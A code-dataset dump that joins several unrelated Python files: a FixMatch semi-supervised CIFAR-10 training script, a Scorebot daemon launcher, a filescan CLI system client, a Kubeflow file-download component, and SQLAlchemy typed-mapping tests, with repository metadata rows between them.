GPUBatches,
)
from dawn_utils import tsv
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='./data')
parser.add_argument('--log_dir', type=str, default='logs')
parser.add_argument('--mu', type=int, default=1)
parser.add_argument('--file_name', type=str, default="log.tsv")
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=10)
parser.add_argument('--batch_size', type=int, default=512)
parser.add_argument('--threshold', type=float, default=0.95)
parser.add_argument('--ema_step', type=int, default=5)
parser.add_argument('--ema_momentum', type=float, default=0.99)
parser.add_argument('--meps', action='store_true', default=False,
help='use MEPS to compute logits')
parser.add_argument('--meps-type', default='meps', type=str,
choices=['meps', 'dwac'],
help='use MEPS formulation or DWAC')
parser.add_argument('--unsup', default=False, action='store_true')
parser.add_argument('--similarity', default='normalized_l2', type=str,
choices=['rbf', 'l2', 'normalized_l2', 'dot_product', 'polynomial', 'normalized_dot_product'],
help='choice of similarity function (note that pos-def kernel function must be used with DWAC')
parser.add_argument('--temperature', type=float, default=1)
parser.add_argument('--num_labeled', type=int, default=40)
parser.add_argument('--device', type=str, default="cuda")
parser.add_argument('--n_classes', type=int, default=10)
STEP = 0
batch_norm = partial(GhostBatchNorm, num_splits=16, weight_freeze=True)
# batch_norm = nn.BatchNorm2d
def set_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
np.random.seed(seed)
class ConvBN(nn.Module):
def __init__(self, c_in, c_out, pool=None):
super().__init__()
self.conv = nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1, bias=False)
self.pool = pool
self.bn = batch_norm(c_out) # nn.BatchNorm2d(c_out) #
self.relu = nn.CELU(alpha=0.3)
def forward(self, x):
out = self.conv(x)
if self.pool is not None:
out = self.pool(out)
out = self.bn(out)
out = self.relu(out)
return out
class WhiteningFilter(nn.Module):
def __init__(self, Λ, V, eps=1e-2):
super().__init__()
filt = nn.Conv2d(3, 27, kernel_size=(3,3), padding=(1,1), bias=False)
filt.weight.data = (V/torch.sqrt(Λ+eps)[:,None,None,None])
filt.weight.requires_grad = False
self.filt = filt
def forward(self, x):
return self.filt(x)
class WhiteningBlock(nn.Module):
def __init__(self, c_in, c_out, Λ=None, V=None, eps=1e-2):
super().__init__()
self.whitening = WhiteningFilter(Λ, V, eps)
self.layers = nn.Sequential(OrderedDict([
('conv', nn.Conv2d(27, c_out, kernel_size=(1, 1), bias=False)),
('bn', batch_norm(c_out)), # nn.BatchNorm2d(c_out)),
('relu', nn.CELU(alpha=0.3))
]))
def forward(self, x):
out = self.whitening(x)
out = self.layers(out)
return out
class Residual(nn.Module):
def __init__(self, c):
super().__init__()
self.conv1 = ConvBN(c, c)
self.conv2 = ConvBN(c, c)
def forward(self, x):
return x + self.conv2(self.conv1(x))
class ResNet9(nn.Module):
def __init__(self, weight, Λ, V):
super().__init__()
channels = [64, 128, 256, 512]
residuals = [False, True, False, True]
self.layers = []
self.layers.append(
WhiteningBlock(3, channels[0], Λ, V)
)
pool = nn.MaxPool2d(2)
for i in range(1, len(channels)):
self.layers.append(
ConvBN(channels[i-1], channels[i], pool=pool)
)
if residuals[i]:
self.layers.append(
Residual(channels[i])
)
self.layers.extend([
nn.MaxPool2d(4),
Flatten(),
# nn.Linear(channels[-1], 10, bias=False),
Mul(weight)
])
self.layers = nn.ModuleList(self.layers)
def forward(self, x):
out = x
for layer in self.layers:
out = layer(out)
return out
def half(self):
for n, p in self.named_parameters():
if "bn" not in n:
p.data = p.data.half()
return self
class LabelSmoothingLoss:
def __init__(self, alpha):
self.alpha = alpha
def __call__(self, logits, targets):
log_probs = F.log_softmax(logits, -1, _stacklevel=5)
cross_entropy = F.nll_loss(log_probs, targets, reduction='none')
kl = -log_probs.mean(dim=-1)
loss = (1 - self.alpha) * cross_entropy + self.alpha * kl
return loss.sum()
class Transform(Dataset):
def __init__(self, dataset, device, transforms=None, to_pil=False):
super().__init__()
self.data, self.targets = dataset["data"], dataset["targets"]
if to_pil:
func = NumpyToPIL()
self.data = [func(d) for d in self.data]
self.transforms = transforms
self.device = device
def __len__(self):
return len(self.data)
def __getitem__(self, index):
data, targets = self.data[index], self.targets[index]
if self.transforms:
data = self.transforms(data)
return data, targets
class TransformFixMatch(object):
def __init__(self, mean, std):
self.weak = tv.transforms.Compose([
# NumpyToPIL(),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.RandomCrop(size=32,
padding=4,
padding_mode='reflect')])
self.strong = tv.transforms.Compose([
# NumpyToPIL(),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.RandomCrop(size=32,
padding=4,
padding_mode='reflect'),
RandAugmentMC(n=2, m=10)])
self.normalize = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean=mean, std=std),
ToHalf()])
def __call__(self, x):
weak = self.weak(x)
strong = self.strong(x)
return self.normalize(weak), self.normalize(strong)
class MEPSTransform:
def __init__(self, transform):
self.transform = transform
def __call__(self, x):
return x, self.transform(x)
class ToHalf:
def __call__(self, x):
return x.half()
class NumpyToPIL:
def __call__(self, x):
return Image.fromarray(x)
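# Returns a closure that folds the live model's weights into the EMA model every
# `update_freq` steps, using an effective decay of momentum**update_freq per update.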
def update_ema(momentum, update_freq=1):
rho = momentum**update_freq
def step(step, model, ema_model):
if (step % update_freq) != 0: return
for v, ema_v in zip(model.state_dict().values(), ema_model.state_dict().values()):
if not v.dtype.is_floating_point: continue #skip things like num_batches_tracked.
ema_v *= rho
ema_v += (1-rho)*v
return step
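# interleave/de_interleave reshuffle the concatenated labeled + weak + strong batch so that
# batch-norm statistics are computed over a mix of all three views during the single forward
# pass; de_interleave restores the original ordering before the losses are computed.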
def interleave(x, size):
s = list(x.shape)
return x.reshape([-1, size] + s[1:]).transpose(0, 1).reshape([-1] + s[1:])
def de_interleave(x, size):
s = list(x.shape)
return x.reshape([size, -1] + s[1:]).transpose(0, 1).reshape([-1] + s[1:])
def train(args, device, model, ema_model, train_batches, unlabeled_batches, opts, lr_schedulers, loss_func):
ema_func = update_ema(args.ema_momentum, args.ema_step)
train_meter = {
"loss": 0,
"acc": 0,
"mask": 0,
"n": 0
}
model.train()
ema_model.train()
global STEP
unlabeled_iter = iter(unlabeled_batches)
# loop over the labeled data
for batch in train_batches:
for opt, scheduler in zip(opts, lr_schedulers):
lr = scheduler(STEP)
for param_group in opt.param_groups:
param_group['lr'] = lr
inputs_x, targets_x = batch
# (inputs_u_w, inputs_u_s), _ = u_batch
        try:
            (inputs_u_w, inputs_u_s), _ = next(unlabeled_iter)
        except StopIteration:
            unlabeled_iter = iter(unlabeled_batches)
            (inputs_u_w, inputs_u_s), _ = next(unlabeled_iter)
batch_size = inputs_x.shape[0]
inputs = interleave(
torch.cat((inputs_x, inputs_u_w, inputs_u_s)), 2*args.mu+1).to(device)
targets_x = targets_x.to(device)
logits = model(inputs)
logits = de_interleave(logits, 2*args.mu+1)
logits_x = logits[:batch_size]
logits_u_w, logits_u_s = logits[batch_size:].chunk(2)
del logits
# Lx = loss_func(logits_x, targets_x)
Lx = F.cross_entropy(logits_x, targets_x, reduction='none').mean()
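        # FixMatch-style unsupervised loss: pseudo-labels come from the weakly augmented view,
        # and only predictions above the confidence threshold contribute to the loss computed
        # on the strongly augmented view.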
pseudo_label = torch.softmax(logits_u_w.detach()/1, dim=-1)
max_probs, targets_u = torch.max(pseudo_label, dim=-1)
mask = max_probs.ge(args.threshold).float()
Lu = (F.cross_entropy(logits_u_s, targets_u,
reduction='none') * mask).mean()
loss = (0.5 * Lx + 0.5 * Lu) * batch_size
loss.backward()
for opt in opts:
opt.step()
opt.zero_grad()
train_meter["loss"] += loss.item()
train_meter["acc"] += (logits_x.max(dim=-1)[1] == targets_x).sum().item()
train_meter["n"] += batch_size
train_meter["mask"] += mask.mean().item() * batch_size
ema_func(STEP, model, ema_model)
STEP += 1
train_meter["loss"] = train_meter["loss"] / train_meter["n"]
train_meter["acc"] = train_meter["acc"] / train_meter["n"]
train_meter["mask"] = train_meter["mask"] / train_meter["n"]
del train_meter["n"]
return train_meter
def warmup_cudnn(loss_func, batch_sizes, device):
random_batch = lambda batch_size: {
'input': torch.Tensor(np.random.rand(batch_size,3,32,32)).cuda().half(),
'target': torch.LongTensor(np.random.randint(0,10,batch_size)).cuda()
}
random_data = torch.tensor(np.random.randn(1000,3,32,32).astype(np.float16), device=device)
Λ, V = eigens(patches(random_data))
model = ResNet9(weight=1/16, Λ=Λ, V=V).to(device).half()
for size in batch_sizes:
batch = random_batch(size)
inputs, targets = batch["input"], batch["target"]
logits = model(inputs)
loss = F.cross_entropy(logits, targets, reduction='none').sum()
model.zero_grad()
loss.backward()
torch.cuda.synchronize()
@torch.no_grad()
def test(device, model, ema_model, test_batches, loss_func, tta=None):
meter = {
"loss": 0,
"acc": 0,
"n": 0
}
model.eval()
ema_model.eval()
for batch in test_batches:
inputs, targets = batch
inputs, targets = inputs.to(device), targets.to(device)
# inputs, targets = batch["input"], batch["target"]
if tta:
logits = torch.mean(torch.stack([ema_model(t(inputs)) for t in tta], dim=0), dim=0)
else:
logits = ema_model(inputs)
# loss = loss_func(logits, targets)
loss = F.cross_entropy(logits, targets, reduction='none').sum()
meter["loss"] += loss.item()
meter["acc"] += (logits.max(dim=-1)[1] == targets).sum().item()
meter["n"] += inputs.shape[0]
meter["loss"] = meter["loss"] / meter["n"]
meter["acc"] = meter["acc"] / meter["n"]
del meter["n"]
return meter
def x_u_split(labels, expand_samples, num_labeled, num_classes):
# https://github.com/kekmodel/FixMatch-pytorch/blob/master/dataset/cifar.py
label_per_class = num_labeled // num_classes
labels = np.array(labels)
labeled_idx = []
# unlabeled data: all data (https://github.com/kekmodel/FixMatch-pytorch/issues/10)
unlabeled_idx = np.array(range(len(labels)))
for i in range(num_classes):
idx = np.where(labels == i)[0]
idx = np.random.choice(idx, label_per_class, False)
labeled_idx.extend(idx)
labeled_idx = np.array(labeled_idx)
assert len(labeled_idx) == num_labeled
num_expand_x = math.ceil(expand_samples / num_labeled)
labeled_idx = np.hstack([labeled_idx for _ in range(num_expand_x)])
np.random.shuffle(labeled_idx)
return labeled_idx, unlabeled_idx
if __name__ == "__main__":
args = parser.parse_args()
set_seed(args.seed)
device = args.device
print(args)
print('Downloading datasets')
# dataset = map_nested(torch.tensor, cifar10(args.data_dir))
dataset = cifar10(args.data_dir)
epochs, ema_epochs = args.epochs, 2
lr_schedule = PiecewiseLinear([0, epochs/5, epochs-ema_epochs], [0, 1.0, 0.1])
batch_size = args.batch_size
# train_transforms = [Crop(32, 32), FlipLR()]
loss_func = LabelSmoothingLoss(0.2)
print('Warming up torch')
warmup_cudnn(
loss_func,
[batch_size, batch_size*(2*args.mu+1), len(dataset['valid']['targets']) % batch_size], # normal batch size and val last batch size
device
)
print('Starting timer')
timer = Timer(synch=torch.cuda.synchronize)
# Separate dataset
labeled_idx, unlabeled_idx = x_u_split(
dataset['train']['targets'],
50000,
args.num_labeled,
10
)
print(len(labeled_idx), len(unlabeled_idx))
print('Preprocessing training data')
# dataset = map_nested(to(device), dataset)
# T = lambda x: torch.tensor(x, dtype=torch.float16, device=device)
T = lambda x: torch.tensor(x, dtype=torch.float16)
transforms = [
# torch.tensor
# to(dtype=torch.float16),
T,
partial(normalise, mean=T(cifar10_mean), std=T(cifar10_std)),
partial(transpose, source='NHWC', target='NCHW'),
]
train_set = preprocess(dataset['train'], transforms)
Λ, V = eigens(patches(train_set['data'][:10000,:])) #center crop to remove padding
model = ResNet9(weight=1/16, Λ=Λ, V=V).to(device).half()
print(f'Finished in {timer():.2} seconds')
print('Preprocessing test data')
test_set = preprocess(dataset['valid'], transforms)
print(f'Finished in {timer():.2} seconds')
tensor_mean, tensor_std = (0.4914, 0.4822, 0.4465), (0.2471, 0.2435, 0.2616)
train_transforms = tv.transforms.Compose([
tv.transforms.RandomHorizontalFlip(p=0.5),
tv.transforms.RandomCrop(32, padding=4, padding_mode='reflect'),
])
unlabeled_transforms = TransformFixMatch(tensor_mean, tensor_std)
meps_transform = MEPSTransform(train_transforms)
unique_train_set = Transform(train_set, device, meps_transform)
unique_train_set = Subset(unique_train_set, np.unique(labeled_idx))
train_set = Transform(train_set, device, train_transforms)
train_set = Subset(train_set, labeled_idx)
unlabeled_set = Transform(dataset['train'], device, unlabeled_transforms, to_pil=True)
unlabeled_set = Subset(unlabeled_set, unlabeled_idx)
unique_labeled_trainloader = DataLoader(
unique_train_set,
batch_size=args.num_labeled,
drop_last=False)
model = meps_wrapper(model, unique_labeled_trainloader, args)
unlabeled_workers = 4 if args.mu == 1 else 8
train_batches = DataLoader(train_set, batch_size, num_workers=4, shuffle=True, drop_last=True)
unlabeled_batches = DataLoader(unlabeled_set, batch_size*args.mu, num_workers=unlabeled_workers, shuffle=True, drop_last=True)
test_batches = DataLoader(Transform(test_set, device, None), batch_size, num_workers=4, shuffle=False, drop_last=False)
# train_batches = GPUBatches(batch_size=batch_size, transforms=train_transforms, dataset=train_set, shuffle=True, drop_last=True, max_options=200)
# test_batches = GPUBatches(batch_size=batch_size, dataset=test_set, shuffle=False, drop_last=False)
is_bias = group_by_key(('bias' in k, v) for k, v in trainable_params(model).items())
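    # Bias parameters use a learning rate 64x larger and a weight decay 64x smaller than
    # the non-bias parameters, each driven by the same piecewise-linear schedule.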
schedules = [
lambda step: lr_schedule((step+1)/len(train_batches))/batch_size,
lambda step: lr_schedule((step+1)/len(train_batches))*(64/batch_size)
]
opts = [
optim.SGD(is_bias[False], lr=schedules[0](0), weight_decay=5e-4*batch_size, momentum=0.9, nesterov=True),
optim.SGD(is_bias[True], lr=schedules[1](0), weight_decay=5e-4*batch_size/64, momentum=0.9, nesterov=True)
]
logs = Table()
ema_model = copy.deepcopy(model)
for epoch in range(1, epochs+1):
train_summary = train(args, device, model, ema_model, train_batches, unlabeled_batches, opts, schedules, loss_func)
train_time = timer()
test_summary = test(device, model, ema_model, test_batches, loss_func, [lambda x: x, flip_lr])
test_time = timer(include_in_total=False)
log = {
"train": union({"time": train_time}, train_summary),
"valid": union({"time": test_time}, test_summary),
"total time": timer.total_time
}
logs.append(union({"epoch": epoch}, log))
with open(os.path.join(os.path.expanduser(args.log_dir), args.file_name), 'w') as f:
f.write(tsv(logs.log))
| 30.657095
| 151
| 0.621412
|
d0d929e3c3c2558e6386a512e5f7335a06f68a7e
| 1,330
|
py
|
Python
|
sb_service/daemons/ScorebotDaemonJava.py
|
isabella232/scorebot
|
71f26a73b04c419ed0ccfbe73575d4b02fa26595
|
[
"Apache-2.0"
] | 63
|
2019-11-22T23:54:21.000Z
|
2020-10-15T16:42:34.000Z
|
sb_service/daemons/ScorebotDaemonJava.py
|
isabella232/scorebot
|
71f26a73b04c419ed0ccfbe73575d4b02fa26595
|
[
"Apache-2.0"
] | null | null | null |
sb_service/daemons/ScorebotDaemonJava.py
|
isabella232/scorebot
|
71f26a73b04c419ed0ccfbe73575d4b02fa26595
|
[
"Apache-2.0"
] | 11
|
2019-11-23T04:41:15.000Z
|
2021-06-10T15:14:21.000Z
|
import logging
from logging import config
import sys
from common.orm_loaded_constants import constants
from sb_service.common import logging_util
from external_tools.daemon.daemonize import Daemon
from sb_service.daemons.ScorebotDaemon import ScorebotDaemon
class ScorebotDaemonJava(Daemon):
"""
The ScorebotDaemon handles maintenance operations for SCORE Bot Rules.
    If there is any GitHub web-hook data (branch pull requests) queued that has not been
    processed, load it and send it for processing.
"""
def __init__(self, pidfile):
super(ScorebotDaemonJava, self).__init__(pidfile=pidfile)
self._daemon_name = "ScorebotDaemonJava"
logging.config.dictConfig(logging_util.get_logging_conf(self._daemon_name, constants.SCOREBOT_DAEMON_JAVA_LOG))
self._logger = logging.getLogger(__name__)
self.ScorebotProcess = ScorebotDaemon("Java", self._logger, self._daemon_name,
constants.SCOREBOT_DAEMON_JAVA_LOG)
def run(self):
self.ScorebotProcess.run()
daemon = ScorebotDaemonJava(constants.SCOREBOT_DAEMON_JAVA_PID)
# Check to see if we're running under the debugger, if we are then bypass the daemonize and just run directly.
if sys.gettrace() is not None:
daemon.run()
else:
daemon.perform_action()
| 38
| 119
| 0.745865
|
c68fa4a0c81c6cb70606a00ba779339ec40f8bae
| 1,122
|
py
|
Python
|
filescan_cli/service/system.py
|
filescanio/fsio-cli
|
5129fbf06dd4a4fbf3a3237d3b7cbe73c9526fa8
|
[
"MIT"
] | null | null | null |
filescan_cli/service/system.py
|
filescanio/fsio-cli
|
5129fbf06dd4a4fbf3a3237d3b7cbe73c9526fa8
|
[
"MIT"
] | 3
|
2022-03-15T08:53:59.000Z
|
2022-03-18T17:52:09.000Z
|
filescan_cli/service/system.py
|
filescanio/fsio-cli
|
5129fbf06dd4a4fbf3a3237d3b7cbe73c9526fa8
|
[
"MIT"
] | 1
|
2022-03-22T23:54:03.000Z
|
2022-03-22T23:54:03.000Z
|
import json
from filescan_cli.core.http import HttpRequests
from filescan_cli.common.utils import run_safe
from filescan_cli.service.endpoints import get_endpoint, SYSTEM_INFO, SYSTEM_CONFIG
from filescan_cli.service.headers import get_public_header
class System:
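    # Thin wrapper around the public system endpoints; both methods return
    # {'content': ...} on success or {'error': ...} on failure.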
def __init__(self):
self.http_client = HttpRequests()
self.headers = get_public_header()
async def get_info(self):
endpoint = get_endpoint(SYSTEM_INFO)
result = await run_safe(
self.http_client.get,
endpoint,
headers=self.headers
)
if result['success']:
return { 'content': json.loads(result['content']) }
else:
return { 'error': result['content'] }
async def get_config(self):
endpoint = get_endpoint(SYSTEM_CONFIG)
result = await run_safe(
self.http_client.get,
endpoint,
headers=self.headers
)
if result['success']:
return { 'content': json.loads(result['content']) }
else:
return { 'error': result['content'] }
| 26.093023
| 83
| 0.614082
|
87d290b35813849cd2005248400a76043a428293
| 385
|
py
|
Python
|
python_components/download-file/src/download_file.py
|
ptitzler/kfp-component-tests
|
80b67ec61deb83bf459d69a6f0242b1454fa2d43
|
[
"Apache-2.0"
] | null | null | null |
python_components/download-file/src/download_file.py
|
ptitzler/kfp-component-tests
|
80b67ec61deb83bf459d69a6f0242b1454fa2d43
|
[
"Apache-2.0"
] | null | null | null |
python_components/download-file/src/download_file.py
|
ptitzler/kfp-component-tests
|
80b67ec61deb83bf459d69a6f0242b1454fa2d43
|
[
"Apache-2.0"
] | 1
|
2022-01-20T01:54:46.000Z
|
2022-01-20T01:54:46.000Z
|
import kfp
def download(url, file_content: kfp.components.OutputPath(str)):
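    # `file_content` is a KFP OutputPath: the downloaded bytes are written to that path so
    # downstream pipeline components can consume the file.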
import requests
response = requests.get(url=url)
if response.status_code == 200:
with open(file_content, 'wb') as file_content:
file_content.write(response.content)
else:
raise RuntimeError(f'Download of {url} returned HTTP status code {response.status_code}')
| 27.5
| 97
| 0.696104
|
71eb7ce42b11063595e4b6144126e9365eac20eb
| 35,027
|
py
|
Python
|
test/orm/declarative/test_typed_mapping.py
|
petit87/sqlalchemy
|
67d674bd63ca36ac32b23f96e2b19e9dac6b0863
|
[
"MIT"
] | null | null | null |
test/orm/declarative/test_typed_mapping.py
|
petit87/sqlalchemy
|
67d674bd63ca36ac32b23f96e2b19e9dac6b0863
|
[
"MIT"
] | null | null | null |
test/orm/declarative/test_typed_mapping.py
|
petit87/sqlalchemy
|
67d674bd63ca36ac32b23f96e2b19e9dac6b0863
|
[
"MIT"
] | null | null | null |
import dataclasses
import datetime
from decimal import Decimal
from typing import Dict
from typing import Generic
from typing import List
from typing import Optional
from typing import Set
from typing import Type
from typing import TypeVar
from typing import Union
from sqlalchemy import BIGINT
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import exc as sa_exc
from sqlalchemy import ForeignKey
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import Numeric
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import VARCHAR
from sqlalchemy.exc import ArgumentError
from sqlalchemy.orm import as_declarative
from sqlalchemy.orm import composite
from sqlalchemy.orm import declarative_base
from sqlalchemy.orm import DeclarativeBase
from sqlalchemy.orm import declared_attr
from sqlalchemy.orm import deferred
from sqlalchemy.orm import Mapped
from sqlalchemy.orm import mapped_column
from sqlalchemy.orm import relationship
from sqlalchemy.orm import undefer
from sqlalchemy.orm.collections import attribute_mapped_collection
from sqlalchemy.orm.collections import MappedCollection
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.util.typing import Annotated
class DeclarativeBaseTest(fixtures.TestBase):
def test_class_getitem_as_declarative(self):
T = TypeVar("T", bound="CommonBase") # noqa
class CommonBase(Generic[T]):
@classmethod
def boring(cls: Type[T]) -> Type[T]:
return cls
@classmethod
def more_boring(cls: Type[T]) -> int:
return 27
@as_declarative()
class Base(CommonBase[T]):
foo = 1
class Tab(Base["Tab"]):
__tablename__ = "foo"
a = Column(Integer, primary_key=True)
eq_(Tab.foo, 1)
is_(Tab.__table__, inspect(Tab).local_table)
eq_(Tab.boring(), Tab)
eq_(Tab.more_boring(), 27)
with expect_raises(AttributeError):
Tab.non_existent
class MappedColumnTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = "default"
def test_legacy_declarative_base(self):
typ = VARCHAR(50)
Base = declarative_base(type_annotation_map={str: typ})
class MyClass(Base):
__tablename__ = "mytable"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str]
x: Mapped[int]
is_(MyClass.__table__.c.data.type, typ)
is_true(MyClass.__table__.c.id.primary_key)
def test_required_no_arg(self, decl_base):
with expect_raises_message(
sa_exc.ArgumentError,
r"Python typing annotation is required for attribute "
r'"A.data" when primary '
r'argument\(s\) for "MappedColumn" construct are None or '
r"not present",
):
class A(decl_base):
__tablename__ = "a"
id: Mapped[int] = mapped_column(primary_key=True)
data = mapped_column()
def test_construct_rhs(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id = mapped_column("id", Integer, primary_key=True)
name = mapped_column(String(50))
self.assert_compile(
select(User), "SELECT users.id, users.name FROM users"
)
eq_(User.__mapper__.primary_key, (User.__table__.c.id,))
def test_construct_lhs(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
data: Mapped[Optional[str]] = mapped_column()
self.assert_compile(
select(User), "SELECT users.id, users.name, users.data FROM users"
)
eq_(User.__mapper__.primary_key, (User.__table__.c.id,))
is_false(User.__table__.c.id.nullable)
is_false(User.__table__.c.name.nullable)
is_true(User.__table__.c.data.nullable)
def test_construct_lhs_omit_mapped_column(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str]
data: Mapped[Optional[str]]
x: Mapped[int]
y: Mapped[int]
created_at: Mapped[datetime.datetime]
self.assert_compile(
select(User),
"SELECT users.id, users.name, users.data, users.x, "
"users.y, users.created_at FROM users",
)
eq_(User.__mapper__.primary_key, (User.__table__.c.id,))
is_false(User.__table__.c.id.nullable)
is_false(User.__table__.c.name.nullable)
is_true(User.__table__.c.data.nullable)
assert isinstance(User.__table__.c.created_at.type, DateTime)
def test_construct_lhs_type_missing(self, decl_base):
class MyClass:
pass
with expect_raises_message(
sa_exc.ArgumentError,
"Could not locate SQLAlchemy Core type for Python type: .*MyClass",
):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[MyClass] = mapped_column()
def test_construct_rhs_type_override_lhs(self, decl_base):
class Element(decl_base):
__tablename__ = "element"
id: Mapped[int] = mapped_column(BIGINT, primary_key=True)
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(BIGINT, primary_key=True)
other_id: Mapped[int] = mapped_column(ForeignKey("element.id"))
data: Mapped[int] = mapped_column()
# exact class test
is_(User.__table__.c.id.type.__class__, BIGINT)
is_(User.__table__.c.other_id.type.__class__, BIGINT)
is_(User.__table__.c.data.type.__class__, Integer)
@testing.combinations(True, False, argnames="include_rhs_type")
def test_construct_nullability_overrides(
self, decl_base, include_rhs_type
):
if include_rhs_type:
args = (String,)
else:
args = ()
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
lnnl_rndf: Mapped[str] = mapped_column(*args)
lnnl_rnnl: Mapped[str] = mapped_column(*args, nullable=False)
lnnl_rnl: Mapped[str] = mapped_column(*args, nullable=True)
lnl_rndf: Mapped[Optional[str]] = mapped_column(*args)
lnl_rnnl: Mapped[Optional[str]] = mapped_column(
*args, nullable=False
)
lnl_rnl: Mapped[Optional[str]] = mapped_column(
*args, nullable=True
)
is_false(User.__table__.c.lnnl_rndf.nullable)
is_false(User.__table__.c.lnnl_rnnl.nullable)
is_true(User.__table__.c.lnnl_rnl.nullable)
is_true(User.__table__.c.lnl_rndf.nullable)
is_false(User.__table__.c.lnl_rnnl.nullable)
is_true(User.__table__.c.lnl_rnl.nullable)
def test_fwd_refs(self, decl_base: Type[DeclarativeBase]):
class MyClass(decl_base):
__tablename__ = "my_table"
id: Mapped["int"] = mapped_column(primary_key=True)
data_one: Mapped["str"]
def test_annotated_types_as_keys(self, decl_base: Type[DeclarativeBase]):
"""neat!!!"""
str50 = Annotated[str, 50]
str30 = Annotated[str, 30]
opt_str50 = Optional[str50]
opt_str30 = Optional[str30]
decl_base.registry.update_type_annotation_map(
{str50: String(50), str30: String(30)}
)
class MyClass(decl_base):
__tablename__ = "my_table"
id: Mapped[str50] = mapped_column(primary_key=True)
data_one: Mapped[str30]
data_two: Mapped[opt_str30]
data_three: Mapped[str50]
data_four: Mapped[opt_str50]
data_five: Mapped[str]
data_six: Mapped[Optional[str]]
eq_(MyClass.__table__.c.data_one.type.length, 30)
is_false(MyClass.__table__.c.data_one.nullable)
eq_(MyClass.__table__.c.data_two.type.length, 30)
is_true(MyClass.__table__.c.data_two.nullable)
eq_(MyClass.__table__.c.data_three.type.length, 50)
def test_unions(self):
our_type = Numeric(10, 2)
class Base(DeclarativeBase):
type_annotation_map = {Union[float, Decimal]: our_type}
class User(Base):
__tablename__ = "users"
__table__: Table
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[Union[float, Decimal]] = mapped_column()
reverse_data: Mapped[Union[Decimal, float]] = mapped_column()
optional_data: Mapped[
Optional[Union[float, Decimal]]
] = mapped_column()
# use Optional directly
reverse_optional_data: Mapped[
Optional[Union[Decimal, float]]
] = mapped_column()
# use Union with None, same as Optional but presents differently
# (Optional object with __origin__ Union vs. Union)
reverse_u_optional_data: Mapped[
Union[Decimal, float, None]
] = mapped_column()
float_data: Mapped[float] = mapped_column()
decimal_data: Mapped[Decimal] = mapped_column()
is_(User.__table__.c.data.type, our_type)
is_false(User.__table__.c.data.nullable)
is_(User.__table__.c.reverse_data.type, our_type)
is_(User.__table__.c.optional_data.type, our_type)
is_true(User.__table__.c.optional_data.nullable)
is_(User.__table__.c.reverse_optional_data.type, our_type)
is_(User.__table__.c.reverse_u_optional_data.type, our_type)
is_true(User.__table__.c.reverse_optional_data.nullable)
is_true(User.__table__.c.reverse_u_optional_data.nullable)
is_(User.__table__.c.float_data.type, our_type)
is_(User.__table__.c.decimal_data.type, our_type)
def test_missing_mapped_lhs(self, decl_base):
with expect_raises_message(
ArgumentError,
r'Type annotation for "User.name" should use the '
r'syntax "Mapped\[str\]" or "MappedColumn\[str\]"',
):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
name: str = mapped_column() # type: ignore
def test_construct_lhs_separate_name(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
name: Mapped[str] = mapped_column()
data: Mapped[Optional[str]] = mapped_column("the_data")
self.assert_compile(
select(User.data), "SELECT users.the_data FROM users"
)
is_true(User.__table__.c.the_data.nullable)
def test_construct_works_in_expr(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
class Address(decl_base):
__tablename__ = "addresses"
id: Mapped[int] = mapped_column(primary_key=True)
user_id: Mapped[int] = mapped_column(ForeignKey("users.id"))
user = relationship(User, primaryjoin=user_id == User.id)
self.assert_compile(
select(Address.user_id, User.id).join(Address.user),
"SELECT addresses.user_id, users.id FROM addresses "
"JOIN users ON addresses.user_id = users.id",
)
def test_construct_works_as_polymorphic_on(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
type: Mapped[str] = mapped_column()
__mapper_args__ = {"polymorphic_on": type}
decl_base.registry.configure()
is_(User.__table__.c.type, User.__mapper__.polymorphic_on)
def test_construct_works_as_version_id_col(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
version_id: Mapped[int] = mapped_column()
__mapper_args__ = {"version_id_col": version_id}
decl_base.registry.configure()
is_(User.__table__.c.version_id, User.__mapper__.version_id_col)
def test_construct_works_in_deferred(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = deferred(mapped_column())
self.assert_compile(select(User), "SELECT users.id FROM users")
self.assert_compile(
select(User).options(undefer(User.data)),
"SELECT users.data, users.id FROM users",
)
def test_deferred_kw(self, decl_base):
class User(decl_base):
__tablename__ = "users"
id: Mapped[int] = mapped_column(primary_key=True)
data: Mapped[str] = mapped_column(deferred=True)
self.assert_compile(select(User), "SELECT users.id FROM users")
self.assert_compile(
select(User).options(undefer(User.data)),
"SELECT users.data, users.id FROM users",
)
class MixinTest(fixtures.TestBase, testing.AssertsCompiledSQL):
__dialect__ = "default"
